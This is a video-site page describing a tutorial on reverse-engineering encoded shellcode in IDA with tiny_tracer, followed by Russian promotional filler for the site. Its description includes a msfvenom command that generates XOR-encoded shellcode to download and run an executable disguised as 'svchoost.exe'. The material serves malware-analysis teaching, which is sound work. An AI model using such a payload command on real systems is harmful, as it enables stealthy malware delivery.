Поделитесь видео 🙏

Reversing encoded shellcode [IDA debugging, tiny_tracer, structures_applying] смотреть онлайн

Name: Reversing encoded shellcode [IDA debugging, tiny_tracer, structures_applying] смотреть онлайн
Uploaded: 2023-12-03T16:05:08+00:00
Description: In this video I will be showing encoded shellcode reversing in IDA with help of new feature of tiny_tracer tool. You can see very often used methods in shellcod

Питоновый стартап

• 📁 Технологии и интернет • 👁️ 18 • 📅 03.12.2023

In this video I will be showing encoded shellcode reversing in IDA with help of new feature of tiny_tracer tool.
You can see very often used methods in shellcode to resolve API function addresses via parsing TEB, PEB, Export directory structures and others...
This covers - Generating shellcode, converting shellcode to exe, IDA debugging, applying structures in IDA, using tiny_tracer, cports tool.

Generating encoded shellcode:
msfvenom.bat -p windows/download_exec EXE="svchoost.exe" URL="http://localhost:8080/malware.exe" -e x86/xor_dynamic -o ./shellcode.sc

Loading Type library: ntapi_win7
Add struct types: _TEB, _PEB, _PEB_LDR_DATA, LDR_DATA_TABLE_ENTRY, _IMAGE_DOS_HEADER, _IMAGE_NT_HEADERS32, _IMAGE_EXPORT_DIRECTORY

Not malicious and only for education purpose samples to download here:
https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Reversing%20encoded%20shellcode/Reversing%20encoded%20shellcode.md

Tools:
shellcode2exe - https://github.com/repnz/shellcode2exe
cports - https://www.nirsoft.net/utils/cports.html
PE-bear - https://github.com/hasherezade/pe-bear-releases
tiny_tracer - https://github.com/hasherezade/tiny_tracer
metasploit - https://www.metasploit.com/download
wireshark - https://www.wireshark.org/#download
procmon - https://docs.microsoft.com/en-us/sysinternals/downloads/procmon

Что делает видео по-настоящему запоминающимся? Наверное, та самая атмосфера, которая заставляет забыть о времени. Когда вы заходите на RUVIDEO, чтобы посмотреть онлайн «Reversing encoded shellcode [IDA debugging, tiny_tracer, structures_applying]» бесплатно и без регистрации, вы рассчитываете на нечто большее, чем просто загрузку плеера. И мы это понимаем. Контент такого уровня заслуживает того, чтобы его смотрели в HD 1080, без дрожания картинки и бесконечного буферизации.

Честно говоря, Rutube сегодня — это кладезь уникальных находок, которые часто теряются в общем шуме. Мы же вытаскиваем на поверхность самое интересное. Будь то динамичный экшн, глубокий разбор темы от любимого автора или просто уютное видео для настроения — всё это доступно здесь бесплатно и без лишних формальностей. Никаких «заполните анкету, чтобы продолжить». Только вы, ваш экран и качественный поток.

Если вас зацепило это видео, не забудьте взглянуть на похожие материалы в блоке справа. Мы откалибровали наши алгоритмы так, чтобы они подбирали контент не просто «по тегам», а по настроению и смыслу. Ведь в конечном итоге, онлайн-кинотеатр — это не склад файлов, а место, где каждый вечер можно найти свою историю. Приятного вам отдыха на RUVIDEO!

Видео взято из открытых источников Rutube. Если вы правообладатель, обратитесь к первоисточнику.